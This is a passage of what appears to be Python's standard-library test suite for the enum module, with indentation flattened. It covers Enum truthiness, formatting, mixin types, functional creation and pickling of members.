# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
def test_contains(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
3 in Season
with self.assertRaises(TypeError):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_reserved__sunder_(self):
with self.assertRaisesRegex(
ValueError,
'_sunder_ names, such as "_bad_", are reserved',
):
class Bad(Enum):
_bad_ = 1
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'EnumWithFormatOverride.one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'TestFloat.one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertEqual(str(Test1Enum.One), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited_methods(self):
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
self.assertEqual(phy.pi.upper(), 'PI')
self.assertEqual(phy.tau.count('a'), 1)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
                        temp,
                    )
else:
return temp
